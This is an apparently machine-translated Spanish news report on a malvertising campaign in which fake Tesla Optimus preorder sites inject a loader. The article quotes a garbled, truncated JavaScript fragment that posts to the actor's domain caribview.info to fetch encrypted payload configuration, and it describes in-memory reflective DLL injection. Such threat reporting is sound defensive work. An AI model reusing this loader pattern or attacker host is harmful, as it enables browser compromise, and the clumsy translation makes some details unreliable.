En las últimas semanas, una ráfaga de listados patrocinados prometiendo pedidos anticipados para los optimistas robots anticipados de Tesla comenzaron a aparecer en la parte superior de los resultados de búsqueda de Google.
Estos anuncios ordenaron a los usuarios desprevenidos que falsificaran micrositias que imiten el diseño de Tesla, lo que pretendía aceptar depósitos “no reembolsables” de $ 250 para el acceso temprano a la plataforma de robótica.
A primera vista, lo que parecía ser una estafa de phishing de rutina se ha convertido en una operación mucho más insidiosa: los piratas informáticos han armado estas páginas de destino falsas de Tesla para distribuir cargas útiles de malware personalizadas.
Los analistas de Internet Storm Center señalaron que la campaña surgió por primera vez a principios de agosto, siguiendo los propios materiales promocionales de Tesla que reavivaron el interés público en Optimus.
Optimus Tesla preorden (Fuente – Internet Storm Center)
Al registrar dominios como Offers-Tesla.com y exclusivo-Tesla.com, los actores de amenaza evitan los filtros de correo electrónico tradicionales y el monitoreo de las redes sociales, confiando en su lugar en la plataforma publicitaria de Google para garantizar la máxima visibilidad.
Las víctimas haciendo clic en estos anuncios pagados encontraron una forma de pedido de pedido aparentemente legítimo, sin darse cuenta de que detrás de escena se inyectaban en silencio los guiones maliciosos.
Tras el envío del formulario, en lugar de cobrar la tarjeta de crédito de prueba proporcionada, el sitio respondió con JavaScript diseñado para hacer huellas digitales del navegador del visitante y descargar un cargador de segunda etapa.
Investigadores del centro de tormentas de Internet identificado Este cargador como una variante de la familia “SilentLoader” ampliamente observada, configurada para obtener módulos adicionales del dominio controlado por el actor caribview.info.
El análisis del tráfico de la red reveló solicitudes de publicación HTTP que entregan blobs de configuración cifrados, que el cargador luego descifró y ejecutó en la memoria, sin poner en ejecución en el disco.
Mecanismo de infección Dive Deep Dive
El mecanismo de infección depende de la inyección dinámica de script y la ejecución en memoria para evadir la detección. Cuando el navegador de la víctima representa la página falsa de Tesla, el siguiente fragmento se adjunta dinámicamente a la página de pago:–
(function () {var xhr = new xmlhttprequest (); xhr.open (‘post’, ‘https://caribview.info/tesla/api/config’, true); xhr.onload = function () {var cipher = new uint8array (xhr.response); var configurando = DecrypT clave);
Este código aprovecha las capacidades nativas del navegador para recopilar detalles del sistema, como fuentes instaladas, resolución de pantalla y versiones de complementos, luego publica la huella digital con la API maliciosa.
Oferta-Tesla.com Página de pago que ilustra la inyección de script maliciosa (fuente-Internet Storm Center)
La respuesta cifrada contiene tanto la URL de la carga útil secundaria como una clave criptográfica, asegurando que las defensas basadas en la firma permanezcan ciegas a la verdadera naturaleza de la descarga.
Una vez en la memoria, el cargador inicia una inyección de DLL reflectante en el proceso del navegador de la víctima, otorgando privilegios completos de ejecución del código sin escribir en el disco.
Equipe a su SOC con el acceso completo a los últimos datos de amenazas de cualquiera. Obtenga una prueba gratuita de 14 días
